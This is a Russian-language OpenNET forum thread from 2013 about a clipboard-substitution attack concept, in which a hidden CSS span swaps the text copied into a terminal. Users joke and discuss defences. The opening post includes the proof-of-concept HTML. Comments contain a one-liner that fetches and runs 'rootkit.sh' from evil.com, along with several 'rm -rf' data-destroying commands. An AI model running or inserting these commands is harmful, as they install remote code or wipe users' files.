The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Концепция атаки по подмене копируемого в терминал текста с с..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от opennews (??) on 08-Апр-13, 10:12 
Опубликована (http://thejh.net/misc/website-terminal-copy-paste) интересная концепция тривиальной, но эффективной, атаки, рассчитанной на излишнее доверие к увиденных при копировании в терминал примеров команд с различных сайтов. Используя невидимый, но помещаемый в буфер обмена при копировании, блок "span", можно вместо невинного текста, организовать выполнение в терминале произвольных команд.

<style>
    .codeblock {
      display: inline-block;
      margin-left: 50px;
    }
  </style>


Например, после копирования в окно терминала строки "git clone <span style="position: absolute;  left: -100px; top: -100px">/dev/null; clear; echo "Hello"
git clone</span> git://git.kernel.org/pub/scm/utils/kup/kup.git" на самом деле будет выполнена команда "git clone /dev/null; clear; echo Hello" и отображён текст "git clone git://git.kernel.org/pub/scm/utils/kup/kup.git".

URL: http://www.reddit.com/r/netsec/comments/1bv359/dont_copypast.../
Новость: https://www.opennet.ru/opennews/art.shtml?num=36619

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Концепция атаки по подмене копируемого в терминал текста с с..."  +4 +/
Сообщение от zzzzz (??) on 08-Апр-13, 10:12 
вот это дырень О_О
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Концепция атаки по подмене копируемого в терминал текста с с..."  –1 +/
Сообщение от Аноним (??) on 08-Апр-13, 11:02 
http://images.wikia.com/callofduty/ru/images/6/69/%D0&#...
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

26. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 14:03 
Не беда! Теперь вместо
выделить(что-то), копировать, вставить
>>

выделить(что-то), копировать, вставить,
+
выделить(только то, что действительно можно), вставить

ничетаковерхедпонадобитсяновыямышь

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

36. "Концепция атаки по подмене копируемого в терминал текста с с..."  +2 +/
Сообщение от pavlinux (ok) on 08-Апр-13, 15:06 
Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать текст цветом бэкграунда. :)
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

51. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от 80е on 08-Апр-13, 20:41 
> Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать
> текст цветом бэкграунда. :)

И без зари, и без заката WWW я отродясь копирую текст сначала в самый тупой из редакторов, чтобы просмотреть его перед переносом в промпт.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

65. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от pavlinux (ok) on 09-Апр-13, 05:25 
> я отродясь копирую текст сначала в самый тупой из редакторов,
> чтобы просмотреть его перед переносом в промпт.

Да-да-да, конечно-конечно-конечно, мы тебе верим!

Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

2. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от Аноним (??) on 08-Апр-13, 10:15 
Это скорее недоработка, чем дырень.
[сообщение отредактировано модератором]
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

49. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от 80е on 08-Апр-13, 20:37 
>> Это скорее недоработка, чем дырень.

Вот именно

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Okarin (ok) on 08-Апр-13, 10:24 
Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

60. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от MrClon on 09-Апр-13, 00:40 
> Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!

В вики это не сработает, в них как правило HTML юзать не дают, только свою разметку.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

4. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 10:27 
спасибо за идею :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 10:33 
шикарно же, как это еще раньше не нашли?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

50. "Концепция атаки по подмене копируемого в терминал текста с с..."  –1 +/
Сообщение от 80е on 08-Апр-13, 20:38 
> шикарно же, как это еще раньше не нашли?

ты больной? кто там этого «раньше не находил»???

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

6. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 10:40 
Видимо, следующее первое апреля будет на редкость удачным. :)
Ждем появления специальных тем для юзеров, словивших таким образом `rm -rf $HOME &'.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Концепция атаки по подмене копируемого в терминал текста с с..."  –1 +/
Сообщение от Аноним (??) on 08-Апр-13, 11:03 
А при чем тут HTML5? В указанной конструкции нет ни 1 элемента из HTML5 :)
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

13. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 11:18 
Ну, я про HTML5 и не писал. Да и насколько мне известно, среднестатистический shell пока что кроме bash/csh/ksh скриптов ничего другого не разумеет. Хотя, быть может, наступят те светлые времена, когда HTML-теги можно будет набивать прямо в терминале. А вместо bash будет JavaScript. :)
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

15. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от Аноним (??) on 08-Апр-13, 11:22 
В дополнение:
<rm path="$HOME" class="noecho"/>
Я джва года жду такой shell...
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

61. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от MrClon on 09-Апр-13, 00:46 
> В дополнение:
> <rm path="$HOME" class="noecho"/>
> Я джва года жду такой shell...

class="noecho,force,recursive"

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

12. "Концепция атаки по подмене копируемого в терминал текста с с..."  –1 +/
Сообщение от skybon (ok) on 08-Апр-13, 11:17 
Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "Концепция атаки по подмене копируемого в терминал текста с с..."  +2 +/
Сообщение от Аноним (??) on 08-Апр-13, 11:40 
Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее убирать и только затем в терминал.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "Концепция атаки по подмене копируемого в терминал текста с с..."  –1 +/
Сообщение от zzzzz (??) on 08-Апр-13, 13:20 
> Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее
> убирать и только затем в терминал.

хоть кто-то так делает? а сколько людей читают новостные сайты? да эта хрень просто бомба. единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

22. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от GotF (ok) on 08-Апр-13, 13:33 
> единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

При чём тут ";"? Ловить надо перевод строки.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

23. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 13:55 
По уму, надо бы просто чтобы невидимый текст никуда не копировался.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

30. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от GotF (ok) on 08-Апр-13, 14:20 
> По уму, надо бы просто чтобы невидимый текст никуда не копировался.

Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделать текст невидимым. В общем, всё как обычно сводится к прокладке между креслом и клавиатурой.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

25. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от cmp (ok) on 08-Апр-13, 14:03 
echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

29. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от GotF (ok) on 08-Апр-13, 14:18 
> echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh &&
> chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear &&
> git clone git://kernel.org

Это всё чудесно, но без '\n' в нужном месте не выполнится :)

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

38. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от gegMOPO4 (ok) on 08-Апр-13, 16:30 
Ещё \r.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

18. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Слакварявод on 08-Апр-13, 11:58 
В clipper-е в кедах видно сразу что там в буфер забилось! можно там глядеть, прежде чем вставлять!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "Концепция атаки по подмене копируемого в терминал текста с с..."  +2 +/
Сообщение от 1235235412831 on 08-Апр-13, 12:50 
Патч Брамина v.2.0 :D
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от GotF (ok) on 08-Апр-13, 12:57 
> Патч Брамина v.2.0

Бармина.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

24. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 13:58 
Теперь всё в блокнот копировать.. (
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

27. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от нимус on 08-Апр-13, 14:06 
ну вот, спалили тему...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от pavlinux (ok) on 08-Апр-13, 14:17 
Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень какая-то.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "Концепция атаки по подмене копируемого в терминал текста с с..."  +2 +/
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:25 
эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разметку мне никогда не нравилась.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

58. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Михрютка (ok) on 08-Апр-13, 23:46 
> эта милая привычка браузеров выделять не то, что я вижу, а ещё
> всякую html разметку мне никогда не нравилась.

Сусли^WТекст за пределами окна ты тож не видишь. А он есть.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

57. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Михрютка (ok) on 08-Апр-13, 23:42 
в CSS

span style="position: absolute; left: -100px; top: -100px"

именно выделенные символы и копируются, все по чесноку.

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

31. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:24 
"вставить как простой текст", энтер жать не сразу, не?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

34. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от angra (ok) on 08-Апр-13, 14:34 
В "простом тексте" уже могут быть переводы строки. Да и вычитывать большой блок вряд ли кто-то станет, особенно после вычитки его в браузере.
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

35. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Клыкастый (ok) on 08-Апр-13, 14:39 
ну тогда - "ой!"

- вычитываем в vim-е.
- да и вообще копипастить отучаемся.

оригинальная "дырка" на самом деле. на 90% - social engineering.

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

52. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от Stax (ok) on 08-Апр-13, 20:57 
Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

53. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Клыкастый (ok) on 08-Апр-13, 21:45 
> Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..

уже лучше. и под десяток всего!


Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

37. "Концепция атаки по подмене копируемого в терминал текста с с..."  –6 +/
Сообщение от Аноним (??) on 08-Апр-13, 15:22 
Не понимаю сути проблемы. В гну/линукс такой бардак что написать строчку которая заработает у других людей даже в том же дичтрибутиве очень сложно.
обычно просто нечего копипастить
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

39. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 17:03 
rm -rf /usr
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

41. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 17:17 
rm -rf /* && init 6
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

54. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Xasd (ok) on 08-Апр-13, 22:08 

bash: init: command not found...

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

62. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 09-Апр-13, 01:12 
reboot или shutdown -h now
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

63. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Xasd (ok) on 09-Апр-13, 03:15 
$ reboot
bash: reboot: command not found...
$ shutdown -h now
bash: shutdown: command not found...

и даже так (!) :

$ bash
bash: bash: command not found...
$ ls /bin/ /usr/bin/
ls: cannot access /bin/: No such file or directory
ls: cannot access /usr/bin/: No such file or directory

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

66. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от pavlinux (ok) on 09-Апр-13, 05:29 
>[оверквотинг удален]
> $ shutdown -h now
> bash: shutdown: command not found...
>
> и даже так (!) :
>
$ bash 
> bash: bash: command not found...
> $ ls /bin/ /usr/bin/
> ls: cannot access /bin/: No such file or directory
> ls: cannot access /usr/bin/: No such file or directory
>

echo b > /proc/sysrq-trigger

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

40. "Концепция атаки по подмене копируемого в терминал текста с с..."  +1 +/
Сообщение от Онононо on 08-Апр-13, 17:15 
понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать на любой ОС где есть доступ к шелу.
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

42. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 18:02 
> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
> на любой ОС где есть доступ к шелу.

Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

43. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 18:25 
Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки:
Команда format C:, подтвердить, и после перезагрузки ваш компьютер будет работать гораздо быстрее
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

44. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Онононо on 08-Апр-13, 18:35 
ты окромя винды больше осей не знаешь?
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

46. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 19:16 
> Пользователи винды не очень часто знают что такое cmd.exe

так правильно.

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

68. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 10-Апр-13, 16:55 
>> Пользователи винды не очень часто знают что такое cmd.exe
> так правильно.

А должны?

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

47. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Aceler email(ok) on 08-Апр-13, 19:52 
Когда http://paypal.com/ на самом деле копируется как http://lskdjbsnd.tk/sdefj/sdf/?sdjhasdknb&dfsdf&go=http://pa... при этом по второй ссылке тебе покажут логин пэйпала, а в адресной строке через Javascript будет стоять paypal.com — пользователи венды будут очень недовольны.
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

64. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Xasd (ok) on 09-Апр-13, 03:33 
Firefox can't find the server at www.lskdjbsnd.tk.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

56. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Харитон on 08-Апр-13, 22:22 
>> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
>> на любой ОС где есть доступ к шелу.
> Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe

как бы сказать  уних такой возможности даже нет...
вот павершеле...)))
там и возможности пошире...

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

45. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 08-Апр-13, 19:14 
Я про то почти никогда не имеет смысл что-то копипастить с сайтов.
В прочем url всегда копипастю так что... В общем как страшно жить.
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

55. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Xasd (ok) on 08-Апр-13, 22:10 
 
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

48. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от mmrnmhrm on 08-Апр-13, 20:29 
реквестирую буфер обмена с программируемой логикой
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

59. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Михрютка (ok) on 08-Апр-13, 23:50 
постить на опеннете новости с угловыми скобками в тексте - идеальный метод троллинга аудитории.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "Концепция атаки по подмене копируемого в терминал текста с с..."  +/
Сообщение от Аноним (??) on 09-Апр-13, 13:15 
В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многострочного текста.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру